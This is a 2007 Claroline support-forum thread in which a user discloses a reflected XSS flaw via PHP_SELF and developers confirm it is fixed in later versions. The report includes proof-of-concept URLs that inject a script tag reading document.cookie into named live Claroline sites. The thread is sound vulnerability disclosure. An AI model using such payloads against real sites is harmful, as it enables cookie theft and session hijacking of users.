Claroline Support

by **munozferna** on Sun Mar 11, 2007 8:10 am

$_SERVER['PHP_SELF'] / $PHP_SELF Injection

Code: Select all: http://campus.claroline.com/index.php/%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E http://www.claroline.net/demo/claroline170/index.php/%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

You can get more info:
http://blog.phpdoc.info/archives/13-XSS-Woes.html
http://php.net/reserved.variables
http://forum.hardened-php.net/viewtopic.php?id=20

There are several other files vulnerable to this issue.
[fms@core claroline183]$ grep PHP_SELF *.php | wc -l
2
[fms@core claroline183]$ grep PHP_SELF */*.php | wc -l
0
[fms@core claroline183]$ grep PHP_SELF */*/*.php | wc -l
462
[fms@core claroline183]$ grep PHP_SELF */*/*/*.php | wc -l
134
[fms@core claroline183]$ grep PHP_SELF */*/*/*/*.php | wc -l
5
[fms@core claroline183]$ grep PHP_SELF */*/*/*/*/*.php | wc -l
15
[fms@core claroline183]$ grep PHP_SELF */*/*/*/*/*/*.php | wc -l
0

by **mathieu** on Mon Mar 12, 2007 10:06 am

Thanks.

Solved in 1.9, we 'll release a new version of 1.8 fixing this XSS.

http://cvs.claroline.net/cgi-bin/viewcv ... 8&r2=1.269
http://cvs.claroline.net/cgi-bin/viewcv ... 93&r2=1.94

Regards

Mathieu

by **zefredz** on Fri Jul 06, 2007 11:17 am

Solved in Claroline 1.8.4+

Claroline Support

index.php XSS [FIXED]

index.php XSS [FIXED]

Who is online